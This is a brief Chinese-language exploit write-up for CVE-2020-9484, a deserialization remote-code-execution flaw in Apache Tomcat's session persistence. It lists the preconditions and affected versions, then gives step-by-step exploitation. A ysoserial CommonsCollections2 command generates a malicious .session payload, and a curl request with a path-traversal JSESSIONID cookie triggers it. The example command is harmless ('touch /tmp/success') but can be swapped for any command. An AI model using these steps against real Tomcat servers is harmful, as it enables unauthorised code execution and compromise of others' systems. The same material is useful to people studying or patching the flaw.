CVE-2020-9484 Session 持久化反序列化 RCE

## CVE-2020-9484 Session 持久化反序列化 RCE

**利用条件**

1. tomcat/lib 或者 WEB-INF/lib 目录下的依赖存在可用的 gadget
2. 存在文件上传功能（传到任意目录都可以，需要知道上传后的目录路径以及文件后缀必须为.session）

**影响版本**

– Apache Tomcat : 10.0.0-M1 to 10.0.0-M4
– Apache Tomcat : 9.0.0.M1 to 9.0.34
– Apache Tomcat : 8.5.0 to 8.5.54
– Apache Tomcat : 7.0.0 to 7.0.103

**漏洞利用**

（1）使用 [ysoserial](https://github.com/frohoff/ysoserial) 生成环境依赖的 gadget 恶意序列化数据：

“`sh
$ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 “touch /tmp/success” > /tmp/payload.session
“`

（2）上传 `payload.session` 到 `/usr/local/tomcat/payload.session`（后缀必须为 .session）

（3）访问触发

“`sh
$ curl ‘http://127.0.0.1:8080/index.jsp’ -H ‘Cookie: JSESSIONID=../../../../../usr/local/tomcat/payload’
“`

[@LFY](https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247487697&idx=1&sn=51981a8b60dd05c7836306dfe3957aa0&scene=21#wechat_redirect)